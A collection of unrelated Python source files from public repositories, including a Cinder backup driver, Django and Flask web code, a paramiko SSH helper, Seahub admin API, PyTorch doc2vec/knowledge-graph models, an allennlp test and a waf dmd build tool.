        # Poll until the backup object returns to 'available', meaning the
        # restore has completed on the node.
        while True:
            url = 'http://' + self._server_ip + '/v2/admin/backups/' + backup_id
            try:
                response = urllib2.urlopen(url)
                ret = response.read()
                LOG.debug("RET: %r" % ret)
                data = json.loads(ret)
            except urllib2.HTTPError as e:
                LOG.debug(e.code)
                msg = "confirm restore cmd failed!"
                raise exception.BackupOperationError(msg)
            if data['backup']['status'] == 'available':
                LOG.info('restore finished.')
                break
            time.sleep(3)

    def delete(self, backup):
        """Delete the backup on the node; treat 404 as already deleted."""
        LOG.info('Starting delete...... backupid:%s' % backup['id'])
        backup_id = backup['id']
        url = 'http://' + self._server_ip + '/v2/admin/backups/' + backup_id
        req = urllib2.Request(url)
        req.add_header('Content-Type', 'application/json')
        req.get_method = lambda: 'DELETE'
        try:
            response = urllib2.urlopen(req)
            LOG.debug(response.read())
        except urllib2.HTTPError as e:
            LOG.debug(e.code)
            if e.code == 404:
                msg = "backup does not exist!"
                LOG.info(msg)
                raise exception.BackupOperationError(msg)
                # help to decide the volume whether belongs to ebs
            else:
                msg = "redirect delete cmd failed!"
                raise exception.BackupOperationError(msg)
        # Poll until the backup object disappears (GET returns 404).
        while True:
            url = 'http://' + self._server_ip + '/v2/admin/backups/' + backup_id
            try:
                urllib2.urlopen(url)
            except urllib2.HTTPError as e:
                LOG.debug(e.code)
                if e.code == 404:
                    """backup does not exist! already success!"""
                    LOG.info('delete finished.')
                    break
                else:
                    msg = "confirm delete cmd failed!"
                    raise exception.BackupOperationError(msg)
            time.sleep(3)
def get_backup_driver(context):
    # Factory entry point used by the cinder backup service loader.
    return SheepdogBackupDriver(context)
if __name__ == '__main__':
    # Smoke-test construction only. Fix: the original called
    # SheepdogBackupDriver() without the required `context` argument,
    # which raises TypeError; no RPC happens until a backup call is made,
    # so None is a safe placeholder here.
    driver = SheepdogBackupDriver(None)
reading/book/migrations/0003_auto_20180613_1926.py | Family-TreeSY/reading | 2 | 12797944 | <reponame>Family-TreeSY/reading<gh_stars>1-10
# -*- coding: utf-8 -*-
# Generated by Django 1.11.3 on 2018-06-13 11:26
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    # Auto-generated by Django 1.11: makes Story.image optional
    # (blank=True) with the verbose name "图片" ("image"); upload_to is the
    # MEDIA_ROOT default (empty string). Do not edit applied migrations.

    dependencies = [
        ('book', '0002_auto_20180613_1914'),
    ]

    operations = [
        migrations.AlterField(
            model_name='story',
            name='image',
            field=models.ImageField(blank=True, upload_to=b'', verbose_name='\u56fe\u7247'),
        ),
    ]
| 1.039063 | 1 |
api/states/apiviews.py | Mastersam07/ncovid-19-api | 17 | 12797952 | <reponame>Mastersam07/ncovid-19-api<gh_stars>10-100
from rest_framework import generics, viewsets
from rest_framework.generics import get_object_or_404
from rest_framework.views import APIView
from rest_framework.response import Response
from .models import Data
from .serializers import StateSerializer # CaseSerializer
class StateList(APIView):
    """Read-only endpoint returning every state record."""

    @staticmethod
    def get(request):
        queryset = Data.objects.all()
        serialized = StateSerializer(queryset, many=True).data
        return Response(serialized)
class StateDetail(APIView):
    """Read-only endpoint returning one state record by primary key (404 if absent)."""

    @staticmethod
    def get(request, id):
        record = get_object_or_404(Data, pk=id)
        return Response(StateSerializer(record).data)
class StateViewSet(viewsets.ModelViewSet):
    # Router-backed full CRUD API over the Data model.
    queryset = Data.objects.all()
    serializer_class = StateSerializer
| 1.367188 | 1 |
app.py | manojvirat457/Resume-Matching | 0 | 12797960 | # from scripts import tabledef
# from scripts import forms
# from scripts import helpers
from flask import Flask, redirect, url_for, render_template, request, session
import json
import sys
import os
# import stripe
import pandas as pd
from werkzeug.utils import secure_filename
from sklearn.preprocessing import PolynomialFeatures
from sklearn.linear_model import Ridge
from sklearn.model_selection import train_test_split
from sklearn.pipeline import make_pipeline
from sklearn.metrics.pairwise import cosine_similarity
from sklearn.feature_extraction.text import CountVectorizer
from tkinter import Tk
from tkinter.filedialog import askopenfilename
import numpy as np
import pandas as pd
import jieba
import jieba.analyse
import csv
import ast
import sys
from pdfminer.pdfinterp import PDFResourceManager, PDFPageInterpreter
from pdfminer.pdfpage import PDFPage
from pdfminer.converter import XMLConverter, HTMLConverter, TextConverter
from pdfminer.layout import LAParams
import io
app = Flask(__name__)
# app.secret_key = os.urandom(12) # Generic key for dev purposes only
# stripe_keys = {
# 'secret_key': os.environ['secret_key'],
# 'publishable_key': os.environ['publishable_key']
# }
# stripe.api_key = stripe_keys['secret_key']
# Heroku
#from flask_heroku import Heroku
#heroku = Heroku(app)
# ======== Routing =========================================================== #
# -------- Login ------------------------------------------------------------- #
@app.route('/', methods=['GET', 'POST'])
def login():
    """Extract the text of uploads/sample.pdf with pdfminer and render home.

    Fixes a resource leak in the original: the PDF file handle and the
    pdfminer TextConverter were never closed.
    """
    basepath = os.path.dirname(__file__)
    file_path = os.path.join(basepath, 'uploads', 'sample.pdf')
    rsrcmgr = PDFResourceManager()
    retstr = io.StringIO()
    laparams = LAParams()
    device = TextConverter(rsrcmgr, retstr, laparams=laparams)
    # Create a PDF interpreter object.
    interpreter = PDFPageInterpreter(rsrcmgr, device)
    try:
        with open(file_path, 'rb') as fp:
            # Process each page contained in the document.
            for page in PDFPage.get_pages(fp):
                interpreter.process_page(page)
        data = retstr.getvalue()
    finally:
        device.close()
    print(data)
    return render_template('home.html', user="manoj")
    # return text
def getFile():
    """Open a native file-picker dialog and return the chosen path.

    Bug fix: the original called ``Tk.close()``, which does not exist
    (AttributeError — and it was invoked on the class, not an instance);
    the hidden root window must be torn down with ``destroy()`` instead.
    """
    root = Tk()
    root.withdraw()  # hide the empty root window behind the dialog
    filename = askopenfilename()
    root.destroy()
    return filename
@app.route("/logout")
def logout():
session['logged_in'] = False
return redirect(url_for('login'))
@app.route('/predict', methods=['GET', 'POST'])
def upload():
    """Score how well 'your-resume' matches 'job-description'.

    Reads both texts from uploads/test-upload.csv, builds a shared
    bag-of-words term matrix, persists it (CSV + Excel), and reports the
    cosine similarity between the two documents as a percentage string.
    """
    if request.method == 'GET':
        # f = request.files['file']
        basepath = os.path.dirname(__file__)
        # file_path = os.path.join(
        # basepath, 'uploads', secure_filename(f.filename))
        # f.save(file_path)
        file_path = os.path.join(basepath, 'uploads', 'test-upload.csv')
        df = pd.read_csv(file_path)
        seg_list01 = df['job-description']
        seg_list02 = df['your-resume']
        # Flatten each column into one comma-joined text blob.
        item01_list = seg_list01
        item01 = ','.join(item01_list)
        item02_list = seg_list02
        item02 = ','.join(item02_list)
        documents = [item01, item02]
        # Term-frequency matrix over both documents (rows: item01, item02).
        count_vectorizer = CountVectorizer()
        sparse_matrix = count_vectorizer.fit_transform(documents)
        doc_term_matrix = sparse_matrix.todense()
        df = pd.DataFrame(doc_term_matrix,
                          columns=count_vectorizer.get_feature_names(),
                          index=['item01', 'item02'])
        # Persist the term matrix for inspection (CSV plus an Excel copy).
        df.to_csv(os.path.join(basepath, 'uploads', 'result.csv'))
        read_file = pd.read_csv(os.path.join(basepath, 'uploads',
                                             'result.csv'))
        read_file.to_excel(os.path.join(basepath, 'uploads', 'result.xlsx'),
                           index=None,
                           header=True)
        answer = cosine_similarity(df, df)
        print("CSV Created Successfully")
        # Off-diagonal entry [1, 0] = similarity between the two documents.
        answer = pd.DataFrame(answer)
        answer = answer.iloc[[1], [0]].values[0]
        answer = round(float(answer), 4) * 100
        return "Your resume matched " + str(
            answer) + " %" + " of the job-description!"
    # NOTE(review): non-GET requests fall through and return None, which
    # Flask reports as an error — presumably a placeholder; confirm intent.
    return None
# ======== Main ============================================================== #
if __name__ == "__main__":
app.run(debug=True, use_reloader=True) | 1.664063 | 2 |
common/code/snippets/txt/ssh.py | nevesnunes/env | 4 | 12797968 | <filename>common/code/snippets/txt/ssh.py
import paramiko
import datetime
import subprocess # run it locally if you want, use this for Bash commands
def run_netflow_cmd(command):
    """Run *command* on the SiLK NetFlow box over SSH and report its status.

    Bug fixes vs. the original:
    - the stdout-draining loop had only a commented-out body, which is a
      syntax error (``for`` requires an indented block);
    - print statements normalized to the parenthesized form already used
      elsewhere in this function (valid on both Python 2 and 3).
    """
    rwflow_server_ip = "192.168.3.11"  # SiLK box
    user_name = "netflow"
    keyfile = "/home/marius/.ssh/id_rsa"
    ssh = paramiko.SSHClient()
    ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    ssh.connect(rwflow_server_ip, username=user_name, key_filename=keyfile)
    stdin, stdout, stderr = ssh.exec_command(command + "&& echo 'done'")
    for line in stderr.readlines():
        print(line)
    # Drain stdout so the channel completes; echoing is disabled.
    for line in stdout.readlines():
        pass  # print(line)
    exit_status = stdout.channel.recv_exit_status()  # Blocking call
    if exit_status == 0:
        print(str(datetime.datetime.today()) + ": Command finished successfully.")
    else:
        print("Error", exit_status)
    ssh.close()
| 1.703125 | 2 |
seahub/organizations/api/users.py | samuelduann/seahub | 420 | 12797976 | # Copyright (c) 2012-2016 Seafile Ltd.
import logging
from rest_framework import status
from rest_framework.views import APIView
from rest_framework.response import Response
from rest_framework.authentication import SessionAuthentication
from seaserv import ccnet_api
from seahub.api2.permissions import IsProVersion
from seahub.api2.throttling import UserRateThrottle
from seahub.api2.authentication import TokenAuthentication
from seahub.api2.utils import api_error
from seahub.api2.endpoints.utils import is_org_user
from seahub.utils import is_valid_email
from seahub.base.accounts import User
from seahub.base.templatetags.seahub_tags import email2nickname
from seahub.profile.models import Profile
logger = logging.getLogger(__name__)
def get_user_info(email):
    """Assemble the public profile dict (email, display name, contact email)."""
    profile = Profile.objects.get_profile_by_user(email)
    contact = profile.contact_email if profile and profile.contact_email else ''
    return {
        'email': email,
        'name': email2nickname(email),
        'contact_email': contact,
    }
class OrgAdminUser(APIView):
    # Org-admin endpoint for editing a member's profile fields.
    authentication_classes = (TokenAuthentication, SessionAuthentication)
    throttle_classes = (UserRateThrottle,)
    permission_classes = (IsProVersion,)

    def put(self, request, org_id, email):
        """Update the display name and/or contact email of an org user.

        Permission checking:
        1. only an org admin of this exact org may perform this action;
        2. the target user must belong to the org.
        """
        # resource check: org and target user must both exist
        org_id = int(org_id)
        if not ccnet_api.get_org_by_id(org_id):
            error_msg = 'Organization %s not found.' % org_id
            return api_error(status.HTTP_404_NOT_FOUND, error_msg)
        try:
            user = User.objects.get(email=email)
        except User.DoesNotExist:
            error_msg = 'User %s not found.' % email
            return api_error(status.HTTP_404_NOT_FOUND, error_msg)

        # permission check: requester is staff of this org, and the target
        # user is a member of it
        if not request.user.org.is_staff:
            error_msg = 'Permission denied.'
            return api_error(status.HTTP_403_FORBIDDEN, error_msg)
        if request.user.org.org_id != org_id:
            error_msg = 'Permission denied.'
            return api_error(status.HTTP_403_FORBIDDEN, error_msg)
        if not is_org_user(email, org_id):
            error_msg = 'Permission denied.'
            return api_error(status.HTTP_403_FORBIDDEN, error_msg)

        # update user's name (optional field; skipped when absent)
        name = request.data.get("name", None)
        if name is not None:
            name = name.strip()
            if len(name) > 64:
                error_msg = 'Name is too long (maximum is 64 characters).'
                return api_error(status.HTTP_400_BAD_REQUEST, error_msg)
            if "/" in name:
                error_msg = "Name should not include '/'."
                return api_error(status.HTTP_400_BAD_REQUEST, error_msg)
            try:
                Profile.objects.add_or_update(email, nickname=name)
            except Exception as e:
                logger.error(e)
                error_msg = 'Internal Server Error'
                return api_error(status.HTTP_500_INTERNAL_SERVER_ERROR, error_msg)

        # update user's contact email (optional; empty string clears it)
        contact_email = request.data.get("contact_email", None)
        if contact_email is not None:
            contact_email = contact_email.strip()
            if contact_email != '' and not is_valid_email(contact_email):
                error_msg = 'contact_email invalid.'
                return api_error(status.HTTP_400_BAD_REQUEST, error_msg)
            try:
                Profile.objects.add_or_update(email, contact_email=contact_email)
            except Exception as e:
                logger.error(e)
                error_msg = 'Internal Server Error'
                return api_error(status.HTTP_500_INTERNAL_SERVER_ERROR, error_msg)

        info = get_user_info(email)
        info['is_active'] = user.is_active
        return Response(info)
| 1.28125 | 1 |
models.py | DSRnD/UMLs | 0 | 12797984 | <reponame>DSRnD/UMLs
import torch
import torch.nn as nn
import torch.nn.functional as F
import random
import numpy as np
import torch.autograd as autograd
class NegativeSampling(nn.Module):
    """Negative sampling loss from Mikolov et al., "Distributed
    Representations of Words and Phrases and their Compositionality".
    """

    def __init__(self):
        super(NegativeSampling, self).__init__()
        self._log_sigmoid = nn.LogSigmoid()

    def forward(self, scores):
        """Compute the negative-sampling loss.

        Parameters
        ----------
        scores: tensor of size (batch_size, num_noise_words + 1)
            Sparse unnormalized log probabilities. Column 0 holds the
            ground-truth (target) score; the remaining columns hold scores
            of samples drawn from the noise distribution.
        """
        try:
            num_noise = scores.size()[1] - 1
            target_term = self._log_sigmoid(scores[:, 0])
            noise_term = torch.sum(self._log_sigmoid(-scores[:, 1:]), dim=1)
            batch_size = scores.size()[0]
            return -torch.sum(target_term + noise_term / num_noise) / batch_size
        except:
            # 1-D scores (no noise columns): fall back to a plain summed loss.
            return -torch.sum(torch.sum(self._log_sigmoid(scores)))
class marginLoss(nn.Module):
    """Margin-based ranking loss: sum(max(0, pos - neg + margin))."""

    def __init__(self):
        super(marginLoss, self).__init__()

    def forward(self, pos, neg, margin):
        violation = pos - neg + margin
        return torch.sum(torch.clamp(violation, min=0.0))
def projection_transH(original, norm):
    """Project each row of *original* onto the hyperplane with normal *norm*."""
    component = torch.sum(original * norm, dim=1, keepdim=True)
    return original - component * norm
def projection_DistMult(original, norm1, norm2):
    """DistMult-style bilinear projection: <original, norm1> * norm2 (row-wise)."""
    weight = torch.sum(original * norm1, dim=1, keepdim=True)
    return weight * norm2
def projection_transD(original, norm):
    """TransD-style projection: original + <original, norm> * norm (row-wise)."""
    component = torch.sum(original * norm, dim=1, keepdim=True)
    return original + component * norm
class Link_Model(nn.Module):
    """Link-prediction head: maps a KG triplet score to a scalar.

    Fixes vs. the original (which could not run at all):
    - ``super().__init__()`` was never called (required by nn.Module before
      registering sub-modules);
    - ``self.vec_dim``/``self.out_dim`` referenced the undefined names
      ``vec_dinm``/``out_dim`` (NameError) and were unused — dropped;
    - ``nn.Linear`` does not accept a ``requires_grad`` kwarg (its
      parameters require grad by default);
    - ``forward`` passed the undefined placeholder ``_`` into the KG model.
    """

    def __init__(self, kg_model):
        super(Link_Model, self).__init__()
        self.kg_model = kg_model  # trained D2V_KG scorer, used frozen
        self.linear = nn.Linear(1, 1, bias=True)

    def forward(self, hi, ti, ri):
        with torch.no_grad():
            # D2V_KG.forward requires a noise tail; reuse ti so that only
            # the positive score `pos` (all we consume) is meaningful.
            # NOTE(review): assumes kg_model was built with
            # d2v_model_ver='none' so the doc2vec args may be None — confirm.
            _, _, _, _, pos, _ = self.kg_model(None, None, None, hi, ti, ri, ti)
        out = self.linear(pos.unsqueeze(1))
        return out
class D2V_KG(nn.Module):
    """Doc2vec model jointly trained with a knowledge-graph embedding loss
    (TransH / TransE / DistMult / TransR / TransD), mixed via `delta`.
    """
    def __init__(self, vec_dim, num_docs, num_words, n_rel, d2v_model_ver, kg_model_ver, margin, delta):
        # vec_dim: embedding dimensionality; n_rel: number of KG relations;
        # margin: ranking-loss margin; delta: weight of the KG loss in the mix.
        super(D2V_KG, self).__init__()
        self.num_docs = num_docs
        self.margin = margin
        self.delta = delta
        self.kg_model_ver = kg_model_ver
        self.d2v_model_ver = d2v_model_ver
        # Any value other than 'dm' (including 'none') builds a DBOW backbone;
        # its _D matrix doubles as the KG entity-embedding table.
        if d2v_model_ver == 'dm':
            self.d2v = DM(vec_dim, num_docs, num_words)
        else:
            self.d2v = DBOW(vec_dim, num_docs, num_words)
        self.cost_func = NegativeSampling()
        self.kg_loss_fn = marginLoss()
        # W_R: relation translation vectors; D_R: hyperplane normals (TransH)
        # or projection vectors (TransD); M_R: per-relation matrices (TransR).
        self.W_R = nn.Parameter(
            torch.randn(n_rel, vec_dim), requires_grad=True)
        self.D_R = nn.Parameter(
            torch.randn(n_rel, vec_dim), requires_grad=True)
        self.M_R = nn.Parameter(
            torch.randn(n_rel, vec_dim, vec_dim), requires_grad=True)
        # L2-normalize entity and relation embeddings at initialization.
        normalize_entity_emb = F.normalize(self.d2v._D.data, p=2, dim=1)
        normalize_relation_emb = F.normalize(self.W_R.data, p=2, dim=1)
        normalize_norm_emb = F.normalize(self.D_R.data, p=2, dim=1)
        self.d2v._D.data = normalize_entity_emb
        self.W_R.data = normalize_relation_emb
        self.D_R.data = normalize_norm_emb
    def forward(self, context_ids, doc_ids, target_noise_ids, hi, ti, ri, tj):
        """Sparse computation of scores (unnormalized log probabilities)
        that should be passed to the negative sampling loss.
        Parameters
        ----------
        context_ids: torch.Tensor of size (batch_size, num_context_words)
            Vocabulary indices of context words.
        doc_ids: torch.Tensor of size (batch_size,)
            Document indices of paragraphs.
        target_noise_ids: torch.Tensor of size (batch_size, num_noise_words + 1)
            Vocabulary indices of target and noise words. The first element in
            each row is the ground truth index (i.e. the target), other
            elements are indices of samples from the noise distribution.
        hi: torch.Tensor of size (batch_size,)
            Heads from golden triplets from relational graph
        ti: torch.Tensor of size (batch_size,)
            Tails from golden triplets from relational graph
        ri: torch.Tensor of size (batch_size,)
            Relations from golden triplets from relational graph
        tj: torch.Tensor of size (batch_size,)
            Tails from noisy (corrupted) triplets from relational graph
        Returns
        -------
        tuple: (total_loss, d2v_loss, kg_loss, d2v_output, pos, neg)
        """
        # Look up embeddings for the golden triplet and the corrupted tail.
        hi_emb = self.d2v._D[hi,:]
        ti_emb = self.d2v._D[ti,:]
        w_ri_emb = self.W_R[ri,:]
        d_ri_emb = self.D_R[ri,:]
        #tj = random.sample(np.arange(0,self.num_docs).tolist(), hi_emb.shape[0])
        #if torch.cuda.is_available():
        #    tj = torch.LongTensor(np.asarray(tj)).to(torch.device('cuda'))
        tj_emb = self.d2v._D[tj,:]
        # pos/neg stay None when kg_model_ver == 'none'.
        pos = None
        neg = None
        if self.kg_model_ver == 'transh':
            # Project head/tail onto the relation hyperplane before translation.
            pos_h_e = projection_transH(hi_emb, d_ri_emb)
            pos_t_e = projection_transH(ti_emb, d_ri_emb)
            neg_h_e = projection_transH(hi_emb, d_ri_emb)
            neg_t_e = projection_transH(tj_emb, d_ri_emb)
            pos = torch.sum((pos_h_e + w_ri_emb - pos_t_e) ** 2, 1)
            neg = torch.sum((neg_h_e + w_ri_emb - neg_t_e) ** 2, 1)
        elif self.kg_model_ver == 'transe':
            # Plain translational distance ||h + r - t||^2.
            pos = torch.sum((hi_emb + w_ri_emb - ti_emb) ** 2, 1)
            neg = torch.sum((hi_emb + w_ri_emb - tj_emb) ** 2, 1)
        elif self.kg_model_ver == 'distmult':
            # Bilinear score summed over dimensions.
            pos = torch.sum(projection_DistMult(w_ri_emb, hi_emb, ti_emb), 1)
            neg = torch.sum(projection_DistMult(w_ri_emb, hi_emb, tj_emb), 1)
        elif self.kg_model_ver == 'transr':
            # Map entities into relation space with M_R, then translate.
            M_R = self.M_R[ri,:]
            hi_emb = torch.einsum('ij, ijk -> ik', hi_emb, M_R)
            ti_emb = torch.einsum('ij, ijk -> ik', ti_emb, M_R)
            tj_emb = torch.einsum('ij, ijk -> ik', tj_emb, M_R)
            hi_emb = F.normalize(hi_emb, p=2, dim=1)
            ti_emb = F.normalize(ti_emb, p=2, dim=1)
            tj_emb = F.normalize(tj_emb, p=2, dim=1)
            pos = torch.sum((hi_emb + w_ri_emb - ti_emb) ** 2, 1)
            neg = torch.sum((hi_emb + w_ri_emb - tj_emb) ** 2, 1)
        elif self.kg_model_ver == 'transd':
            hi_emb = projection_transD(hi_emb, w_ri_emb)
            ti_emb = projection_transD(ti_emb, w_ri_emb)
            tj_emb = projection_transD(tj_emb, w_ri_emb)
            pos = torch.sum((hi_emb + w_ri_emb - ti_emb) ** 2, 1)
            neg = torch.sum((hi_emb + w_ri_emb - tj_emb) ** 2, 1)
        # Doc2vec branch (skipped entirely when disabled).
        if self.d2v_model_ver != 'none':
            d2v_output = self.d2v.forward(context_ids, doc_ids, target_noise_ids)
            d2v_loss = self.cost_func.forward(d2v_output)
        else:
            d2v_output = torch.FloatTensor([0])
            d2v_loss = torch.FloatTensor([0])
        if self.kg_model_ver != 'none':
            #print (pos.shape, neg.shape)
            kg_loss = self.kg_loss_fn(pos, neg, self.margin)
        else:
            kg_loss = torch.FloatTensor([0])
        # Convex mix of the two losses when both branches are active.
        if self.d2v_model_ver != 'none' and self.kg_model_ver != 'none':
            total_loss = (1-self.delta)*d2v_loss + self.delta*kg_loss
        elif self.d2v_model_ver != 'none':
            total_loss = d2v_loss
        elif self.kg_model_ver != 'none':
            total_loss = kg_loss
        else:
            raise ValueError("Both D2V and KG model can not be none")
        return total_loss, d2v_loss, kg_loss, d2v_output, pos, neg
    def get_paragraph_vector(self, index):
        # Paragraph (entity) vector at *index* as a plain Python list.
        return self.d2v._D[index, :].data.tolist()
class DM(nn.Module):
    """Distributed Memory version of Paragraph Vectors.

    Parameters
    ----------
    vec_dim: int
        Dimensionality of vectors to be learned (for paragraphs and words).
    num_docs: int
        Number of documents in a dataset.
    num_words: int
        Number of distinct words in a dataset (i.e. vocabulary size).
    """

    def __init__(self, vec_dim, num_docs, num_words):
        super(DM, self).__init__()
        # Paragraph embedding matrix, one row per document.
        self._D = nn.Parameter(
            torch.randn(num_docs, vec_dim), requires_grad=True)
        # Word embedding matrix, one row per vocabulary entry.
        self._W = nn.Parameter(
            torch.randn(num_words, vec_dim), requires_grad=True)
        # Output projection, zero-initialized.
        self._O = nn.Parameter(
            torch.FloatTensor(vec_dim, num_words).zero_(), requires_grad=True)

    def forward(self, context_ids, doc_ids, target_noise_ids):
        """Sparse scores (unnormalized log probabilities) for the
        negative sampling loss.

        Parameters
        ----------
        context_ids: torch.Tensor of size (batch_size, num_context_words)
            Vocabulary indices of context words.
        doc_ids: torch.Tensor of size (batch_size,)
            Document indices of paragraphs.
        target_noise_ids: torch.Tensor of size (batch_size, num_noise_words + 1)
            Vocabulary indices of the target word (column 0) followed by
            noise-distribution samples.
        """
        # Fuse the paragraph vector with the summed context-word vectors.
        combined = self._D[doc_ids, :] + self._W[context_ids, :].sum(dim=1)
        # Score only the target/noise columns of the output layer.
        selected = self._O[:, target_noise_ids].permute(1, 0, 2)
        return torch.bmm(combined.unsqueeze(1), selected).squeeze()

    def get_paragraph_vector(self, index):
        """Return the paragraph vector at *index* as a plain Python list."""
        return self._D[index, :].data.tolist()
class DBOW(nn.Module):
    """Distributed Bag of Words version of Paragraph Vectors.

    Parameters
    ----------
    vec_dim: int
        Dimensionality of vectors to be learned (for paragraphs and words).
    num_docs: int
        Number of documents in a dataset.
    num_words: int
        Number of distinct words in a dataset (i.e. vocabulary size).
    """

    def __init__(self, vec_dim, num_docs, num_words):
        super(DBOW, self).__init__()
        # Paragraph embedding matrix, one row per document.
        self._D = nn.Parameter(
            torch.randn(num_docs, vec_dim), requires_grad=True)
        # Output projection, zero-initialized.
        self._O = nn.Parameter(
            torch.FloatTensor(vec_dim, num_words).zero_(), requires_grad=True)

    def forward(self, context_ids, doc_ids, target_noise_ids):
        """Sparse scores (unnormalized log probabilities) for the
        negative sampling loss. ``context_ids`` is accepted for interface
        parity with DM but is not used by this variant.

        Parameters
        ----------
        doc_ids: torch.Tensor of size (batch_size,)
            Document indices of paragraphs.
        target_noise_ids: torch.Tensor of size (batch_size, num_noise_words + 1)
            Vocabulary indices of the target word (column 0) followed by
            noise-distribution samples.
        """
        paragraph_vecs = self._D[doc_ids, :].unsqueeze(1)
        selected = self._O[:, target_noise_ids].permute(1, 0, 2)
        return torch.bmm(paragraph_vecs, selected).squeeze()

    def get_paragraph_vector(self, index):
        """Return the paragraph vector at *index* as a plain Python list."""
        return self._D[index, :].data.tolist()
| 2.703125 | 3 |
tests/modules/transformer/bimodal_attention_test.py | MSLars/allennlp | 11,433 | 12797992 | <gh_stars>1000+
import torch
import pytest
from allennlp.common import Params
from allennlp.modules.transformer import BiModalAttention
@pytest.fixture
def params_dict():
    # Constructor kwargs for BiModalAttention shared by the tests below.
    return {
        "hidden_size1": 6,
        "hidden_size2": 4,
        "combined_hidden_size": 16,
        "num_attention_heads": 2,
        "dropout1": 0.1,
        "dropout2": 0.2,
    }
@pytest.fixture
def params(params_dict):
    # Wrap the raw dict in an allennlp Params object for from_params().
    return Params(params_dict)
@pytest.fixture
def biattention(params):
    # Fresh module per test; duplicate() keeps the params fixture reusable.
    return BiModalAttention.from_params(params.duplicate())
def test_can_construct_from_params(biattention, params_dict):
    # Construction wires every config value through to the module:
    # head count/size, combined size, per-modality projections and dropouts.
    assert biattention.num_attention_heads == params_dict["num_attention_heads"]
    assert biattention.attention_head_size == int(
        params_dict["combined_hidden_size"] / params_dict["num_attention_heads"]
    )
    assert (
        biattention.all_head_size
        == params_dict["num_attention_heads"] * biattention.attention_head_size
    )
    assert biattention.query1.in_features == params_dict["hidden_size1"]
    assert biattention.key1.in_features == params_dict["hidden_size1"]
    assert biattention.value1.in_features == params_dict["hidden_size1"]
    assert biattention.dropout1.p == params_dict["dropout1"]
    assert biattention.query2.in_features == params_dict["hidden_size2"]
    assert biattention.key2.in_features == params_dict["hidden_size2"]
    assert biattention.value2.in_features == params_dict["hidden_size2"]
    assert biattention.dropout2.p == params_dict["dropout2"]
def test_forward_runs(biattention):
    """Smoke test: the forward pass accepts random inputs and boolean masks."""
    first_modality = torch.randn(2, 3, 6)
    second_modality = torch.randn(2, 3, 4)
    first_mask = torch.randint(0, 2, (2, 2, 3, 3)) == 1  # boolean mask
    second_mask = torch.randint(0, 2, (2, 2, 3, 3)) == 1
    biattention(first_modality, second_modality, first_mask, second_mask)
| 1.851563 | 2 |
src/third_party/angle/third_party/glmark2/src/waflib/Tools/dmd.py | goochen/naiveproxy | 2,151 | 12798000 | <reponame>goochen/naiveproxy
#! /usr/bin/env python
# encoding: utf-8
# WARNING! Do not edit! https://waf.io/book/index.html#_obtaining_the_waf_file
import sys
from waflib.Tools import ar,d
from waflib.Configure import conf
@conf
def find_dmd(conf):
	# Locate a D compiler (dmd/dmd2/ldc) on PATH and verify it really is
	# dmd or an ldc build by probing its --help / -version output.
	conf.find_program(['dmd','dmd2','ldc'],var='D')
	out=conf.cmd_and_log(conf.env.D+['--help'])
	if out.find("D Compiler v")==-1:
		out=conf.cmd_and_log(conf.env.D+['-version'])
		if out.find("based on DMD v1.")==-1:
			conf.fatal("detected compiler is not dmd/ldc")
@conf
def common_flags_ldc(conf):
	# ldc-specific flag overrides: Posix version identifier and PIC
	# relocation model for shared libraries.
	v=conf.env
	v.DFLAGS=['-d-version=Posix']
	v.LINKFLAGS=[]
	v.DFLAGS_dshlib=['-relocation-model=pic']
@conf
def common_flags_dmd(conf):
	# Baseline dmd flag templates: compile/link output patterns, include
	# and library search-path formats, shared-lib and header-gen options.
	v=conf.env
	v.D_SRC_F=['-c']
	v.D_TGT_F='-of%s'
	v.D_LINKER=v.D
	v.DLNK_SRC_F=''
	v.DLNK_TGT_F='-of%s'
	v.DINC_ST='-I%s'
	v.DSHLIB_MARKER=v.DSTLIB_MARKER=''
	v.DSTLIB_ST=v.DSHLIB_ST='-L-l%s'
	v.DSTLIBPATH_ST=v.DLIBPATH_ST='-L-L%s'
	v.LINKFLAGS_dprogram=['-quiet']
	v.DFLAGS_dshlib=['-fPIC']
	v.LINKFLAGS_dshlib=['-L-shared']
	v.DHEADER_ext='.di'
	v.DFLAGS_d_with_header=['-H','-Hf']
	v.D_HDR_F='%s'
def configure(conf):
	# waf configure entry point: find the compiler, reject dmd2 on Windows,
	# load archiver + D support, then apply dmd (and possibly ldc) flags.
	conf.find_dmd()
	if sys.platform=='win32':
		out=conf.cmd_and_log(conf.env.D+['--help'])
		if out.find('D Compiler v2.')>-1:
			conf.fatal('dmd2 on Windows is not supported, use gdc or ldc2 instead')
	conf.load('ar')
	conf.load('d')
	conf.common_flags_dmd()
	conf.d_platform_flags()
	if str(conf.env.D).find('ldc')>-1:
		conf.common_flags_ldc()
| 1.296875 | 1 |